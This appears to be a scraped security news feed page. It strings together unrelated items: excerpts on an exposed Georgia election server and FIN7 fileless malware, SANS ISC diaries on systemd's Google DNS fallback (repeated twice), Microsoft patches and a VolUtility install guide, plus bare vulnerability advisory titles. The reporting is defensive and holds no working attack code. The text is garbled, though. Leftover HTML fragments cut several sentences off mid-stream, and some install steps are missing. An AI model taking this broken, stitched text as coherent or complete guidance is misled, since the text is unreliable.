(credit: Verified Voting)

To understand why many computer scientists and voting rights advocates don't trust the security of many US election systems, consider the experience of Georgia-based researcher Logan Lamb. Last August, after the FBI reported hackers were probing voter registration systems in more than a dozen states, Lamb decided to assess the security of voting systems in his state.

According to a detailed report published Tuesday in Politico, Lamb wrote a simple script that would pull documents off the website of Kennesaw State University’s Center for Election Systems, which under contract with Georgia, tests and programs voting machines for the entire state. By accident, Lamb's script uncovered a breach whose scope should concern both Republicans and Democrats alike. Reporter Kim Zetter writes:

Within the mother lode Lamb found on the center’s website was a database containing registration records for the state’s 6.7 million voters; multiple PDFs with instructions and passwords for election workers to sign in to a central server on Election Day; and software files for the state’s ExpressPoll pollbooks — electronic devices used by poll workers to verify that a voter is registered before allowing them to cast a ballot. There also appeared to be databases for the so-called GEMS servers. These Global Election Management Systems are used to prepare paper and electronic ballots, tabulate votes and produce summaries of vote totals.

The files were supposed to be behind a password-protected firewall, but the center had misconfigured its server so they were accessible to anyone, according to Lamb. “You could just go to the root of where they were hosting all the files and just download everything without logging in,” Lamb says.

And there was another problem: The site was also using a years-old version of Drupal — content management software — that had a critical software vulnerability long known to security researchers. “Drupageddon,” as researchers dubbed the vulnerability, got a lot of attention when it was first revealed in 2014. It would let attackers easily seize control of any site that used the software. A patch to fix the hole had been available for two years, but the center hadn’t bothered to update the software, even though it was widely known in the security community that hackers had created automated scripts to attack the vulnerability back in 2014.

Lamb was concerned that hackers might already have penetrated the center’s site, a scenario that wasn’t improbable given news reports of intruders probing voter registration systems and election websites; if they had breached the center’s network, they could potentially have planted malware on the server to infect the computers of county election workers who accessed it, thereby giving attackers a backdoor into election offices throughout the state; or they could possibly have altered software files the center distributed to Georgia counties prior to the presidential election, depending on where those files were kept.

Lamb privately reported the breach to University officials, the report notes. But he learned this March that the critical Drupal vulnerability had been fixed only on the HTTPS version of the site. What's more, the same mother lode of sensitive documents remained as well. The findings meant that the center was operating outside the scope of both the University and the Georgia Secretary of State for years.

Read 2 remaining paragraphs | Comments

 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
ESA-2017-031: RSA BSAFE® Cert-C Improper Certificate Processing Vulnerability
 
ESA-2017-043: EMC ESRS Virtual Edition Authentication Bypass Vulnerability
 
Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability
 
Microsoft Windows Kernel CVE-2017-0167 Information Disclosure Vulnerability
 

Enlarge (credit: Carol Von Canon)

Researchers have detected a brazen attack on restaurants across the United States that uses a relatively new technique to keep its malware undetected by virtually all antivirus products on the market.

Malicious code used in so-called fileless attacks resides almost entirely in computer memory, a feat that prevents it from leaving the kinds of traces that are spotted by traditional antivirus scanners. Once the sole province of state-sponsored spies casing the highest value targets, the in-memory techniques are becoming increasingly common in financially motivated hack attacks. They typically make use of commonly used administrative and security-testing tools such as PowerShell, Metasploit, and Mimikatz, which attackers use to feed malicious commands to targeted computers.

FIN7, an established hacking group with ties to the Carbanak Gang, is among the converts to this new technique, researchers from security firm Morphisec reported in a recently published blog post. The dynamic link library file it's using to infect Windows computers in an ongoing attack on US restaurants would normally be detected by just about any AV program if the file was written to a hard drive. But because the file contents are piped into computer memory using PowerShell, the file wasn't visible to any of the 56 most widely used AV programs, according to a Virus Total query conducted earlier this month.

Read 6 remaining paragraphs | Comments

 

Google is everywhere and provides free services to everyone. Amongst the huge list of services publicly available, there are the Google DNS, well known as 8.8.8.8, 8.8.4.4 (IPv4) and 2001:4860:4860::8888, 2001:4860:4860::8844(IPv6). But Google is far from being a non-profit organisation and they collect a lot about you via their DNS[1]. Nothing is free and, when you get something for free, you (your data) are the valuable stuff. Never forget this!

It is already known that many systems are using the Google DNS as a fallback configuration. Docker is a good example. As written in the documentation[2]:

After this filtering, if there are no morenameserverentries left in the containers /etc/resolv.conf file,the daemon adds public Google DNS nameservers (8.8.8.8 and 8.8.4.4) to the containers DNS configuration. If IPv6 is enabled on the daemon, the public IPv6 Google DNS nameservers will also be added (2001:4860:4860::8888 and 2001:4860:4860::8844)

Yesterday, there was some interesting tweets passing around about the same kind of behaviour but for systemd[3]. width:400px" />

systemd is the new system introduced in 2012 to replace the good old init padding:5px 10px"> AC_ARG_WITH(dns-servers, AS_HELP_STRING([--with-dns-servers=DNSSERVERS], [space-separated list of default DNS servers]), [DNS_SERVERS=$withval], [DNS_SERVERS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844])

How to interpret this code? systemdhas a built-in fallback mechanism that specifies, at compilation time, that if no resolvers are configured, it uses the Google DNS by default! I performed a quick check on different Linux distributions (installed out-of-the-box):

Distribution Comments
ArchLinux Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
CentOS Nothing found
CoreOS Nothing found
Debian Nothing found
Fedora Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
Gentoo Nothing found
OpenSuse Nothing found
RedHat ES Not tested
Suse ES Not tested
Ubuntu Nothing found

Some distributions, like Slackware, never implemented systemd.

This FallbackDNS purpose is defined here[5]

A space-separated list of IPv4 and IPv6 addresses to use as the fallback DNS servers. Any per-link DNS servers obtained from systemd-networkd.service(8) take precedence over this setting, as do any servers set via DNS= above or /etc/resolv.conf. This setting is hence only used if no other DNS server information is known. If this option is not given, a compiled-in list of DNS servers is used instead.

I also found an old report about this in padding:5px 10px"> AC_ARG_WITH(ntp-servers, AS_HELP_STRING([--with-ntp-servers=NTPSERVERS], [space-separated list of default NTP servers]), [NTP_SERVERS=$withval], [NTP_SERVERS=time1.google.com time2.google.com time3.google.com time4.google.com])

Ok, nothing really critical here. Based on the tested distributions, there is almost no risk to see systemd falling back to the Google DNS. However, this is a good signal to keep in mind that some developers might introduce dangerous features and/or configurations in their code. Grepping for static IP addresses in configuration files is always a good reflex. About the DNS, my recommendation is to restrict the DNS traffic on your network and run your own resolver.

[1]https://developers.google.com/speed/public-dns/privacy
[2]https://docs.docker.com/engine/userguide/networking/default_network/configure-dns/
[3]https://en.wikipedia.org/wiki/Systemd
[4]https://github.com/systemd/systemd/blob/a083537e5d11bce68639c492eda33a7fe997d142/configure.ac#L1305
[5]https://www.freedesktop.org/software/systemd/man/resolved.conf.html#FallbackDNS=
[6]https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761658
[7]https://github.com/systemd/systemd/blob/master/configure.ac#L1218

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Today, Microsoft and Adobe released their usual monthly security updates. Microsoft patched a total of 96 different vulnerabilities. Three vulnerabilities have already been disclosed publicly, and two vulnerabilities stick out for being already exploited according to Microsoft:

%%cve:2017-8464%%

This vulnerability can be exploited when a user views a malicious shortcut file. Windows shortcuts use small files that describe the shortcut. The file will tell Windows what icon to display to represent the file. By including a malicious icon reference, the attacker can execute arbitrary code. This problem is probably easiest exploited by setting up a malicious file share, and tricking the user into opening the file share via a link. Similar vulnerabilities have been exploited in Windows in the past. Exploits should surface shortly in public. Microsofts description of the vulnerability is a bit contradicting itself. In the past, if a vulnerability had already been exploited in the wild, Microsoft labeled them with an exploitability of 0. In this case, Microsoft uses 1, which indicates that exploitation is likely. But on the other hand, the vulnerability is already being exploited.

%%cve:2017-8543%%

ETERNALBLUE Reloaded? This vulnerability is another one that is already exploited according to Microsoft. The vulnerability is triggered by sending a malicious Search message via SMB. The bulletin does not state if exploitation requires authentications. The attacker will have full administrative access to the system, so this vulnerability can also be exploited for privilege escalation.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

If you would like to practicememory forensics using Volatility but you dont like command line tools and you hate to remmber plugins then VolUtility is your friend.

Volutility1 2 is a web frontend for Volatility framework.

Installation

In this dairy, I will install VolUtlity on Linux SIFT3 workstation.

  1. Update your SIFT workstation and install django margin-right:210.0pt">$ sudo apt-get update margin-right:0in">

    1. Install MongoDB :

    In this dairy I am not going to discuss how to install MongoDB , for futher details about margin-left:.5in">

    $ git clone https://github.com/volatilityfoundation/volatility

    $ cd volatility

    $ sudo python setup.py install

    margin-left:.5in">

    $ git clone https://github.com/kevthehermit/VolUtility

    Configuration

    In this diary I am going to use the default config file volutility.conf.sample border:solid windowtext 1.0pt">

    $ ./manage.py runserver 0.0.0.0:8000

    width:400px" />

    Enter a name for the session and the location of the memory image ,for the profile you can either specify it or you can choose autodetect, then click on submit button width:400px" />

    You have to wait for few minutest till it finishes from processing the image, once it finished the status will change to Complete width:400px" />

    To examine the image click on the session name , in this the dairy its SANS ISC width:400px" />

    Now let width:400px" />

    And you can of course filter your result using tools such as MS Excel.

    _______________________________________________________

    [1] https://github.com/kevthehermit/VolUtility/wiki

    [2] http://holisticinfosec.blogspot.com/2016/04/toolsmith-115-volatility-acuity-with.html

    [3] https://digital-forensics.sans.org/community/downloads

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

With two new drivers in my home, I am training them to occasionally look in the rear view mirror of their car as an effective way to increase their situational awareness when driving. What if this principle were applied to the area of hardware and software inventory? Perhaps in the form of a quarterly reminder to consider CIS Critical Security Controls 1 and 2 that called for an objective look at hardware and software that might not be as shiny and new. Intentionally searching for this type of deferred maintenance could very well find unnecessary risk that is imposed on the entire organization.

Some organizations have an interestingapproach - for every new tool purchased, two tools must also be retired. What a novel section to include in the business justification for the next new tool. Take a look in the rear view mirror every once in a while - particularly at the area of technology retirement to make sure you dont just continue to increase the collection of tools. Who knows what might be discovered.

What grade would you give yourself in the discipline of technology retirement? Please leave what works for you in our comments section below.

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Tom Webb

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Adobe Flash Player APSB17-17 Multiple Memory Corruption Vulnerabilities
 
Adobe Flash Player APSB17-17 Multiple Use After Free Remote Code Execution Vulnerabilities
 
Microsoft Internet Explorer CVE-2017-0222 Remote Memory Corruption Vulnerability
 
EMC VNX1/VNX2 OE for File CVE-2017-4987 Unspecified Local Untrusted Search Path vulnerability
 
Microsoft Skype for Business and Lync Server CVE-2017-8550 Remote Code Execution Vulnerability
 
EMC RSA BSAFE Cert-C CVE-2017-4981 Denial of Service Vulnerability
 
Mozilla Firefox CVE-2017-5471 Multiple Memory Corruption Vulnerabilities
 

Google is everywhere and provides free services to everyone. Amongst the huge list of services publicly available, there are the Google DNS, well known as 8.8.8.8, 8.8.4.4 (IPv4) and 2001:4860:4860::8888, 2001:4860:4860::8844(IPv6). But Google is far from being a non-profit organisation and they collect a lot about you via their DNS[1]. Nothing is free and, when you get something for free, you (your data) are the valuable stuff. Never forget this!

It is already known that many systems are using the Google DNS as a fallback configuration. Docker is a good example. As written in the documentation[2]:

After this filtering, if there are no morenameserverentries left in the containers /etc/resolv.conf file,the daemon adds public Google DNS nameservers (8.8.8.8 and 8.8.4.4) to the containers DNS configuration. If IPv6 is enabled on the daemon, the public IPv6 Google DNS nameservers will also be added (2001:4860:4860::8888 and 2001:4860:4860::8844)

Yesterday, there was some interesting tweets passing around about the same kind of behaviour but for systemd[3]. width:400px" />

systemd is the new system introduced in 2012 to replace the good old init padding:5px 10px"> AC_ARG_WITH(dns-servers, AS_HELP_STRING([--with-dns-servers=DNSSERVERS], [space-separated list of default DNS servers]), [DNS_SERVERS=$withval], [DNS_SERVERS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844])

How to interpret this code? systemdhas a built-in fallback mechanism that specifies, at compilation time, that if no resolvers are configured, it uses the Google DNS by default! I performed a quick check on different Linux distributions (installed out-of-the-box):

Distribution Comments
ArchLinux Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
CentOS Nothing found
CoreOS Nothing found
Debian Nothing found
Fedora Found the commented line in /etc/systemd/resvolved.conf:
#FallbackDNS=8.8.8.8 8.8.4.4 2001:4860:4860::8888 2001:4860:4860::8844
Gentoo Nothing found
OpenSuse Nothing found
RedHat ES Not tested
Suse ES Not tested
Ubuntu Nothing found

Some distributions, like Slackware, never implemented systemd.

This FallbackDNS purpose is defined here[5]

A space-separated list of IPv4 and IPv6 addresses to use as the fallback DNS servers. Any per-link DNS servers obtained from systemd-networkd.service(8) take precedence over this setting, as do any servers set via DNS= above or /etc/resolv.conf. This setting is hence only used if no other DNS server information is known. If this option is not given, a compiled-in list of DNS servers is used instead.

I also found an old report about this in padding:5px 10px"> AC_ARG_WITH(ntp-servers, AS_HELP_STRING([--with-ntp-servers=NTPSERVERS], [space-separated list of default NTP servers]), [NTP_SERVERS=$withval], [NTP_SERVERS=time1.google.com time2.google.com time3.google.com time4.google.com])

Ok, nothing really critical here. Based on the tested distributions, there is almost no risk to see systemd falling back to the Google DNS. However, this is a good signal to keep in mind that some developers might introduce dangerous features and/or configurations in their code. Grepping for static IP addresses in configuration files is always a good reflex. About the DNS, my recommendation is to restrict the DNS traffic on your network and run your own resolver.

[1]https://developers.google.com/speed/public-dns/privacy
[2]https://docs.docker.com/engine/userguide/networking/default_network/configure-dns/
[3]https://en.wikipedia.org/wiki/Systemd
[4]https://github.com/systemd/systemd/blob/a083537e5d11bce68639c492eda33a7fe997d142/configure.ac#L1305
[5]https://www.freedesktop.org/software/systemd/man/resolved.conf.html#FallbackDNS=
[6]https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=761658
[7]https://github.com/systemd/systemd/blob/master/configure.ac#L1218

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
[SECURITY] [DSA 3880-1] libgcrypt20 security update
 
Internet Storm Center Infocon Status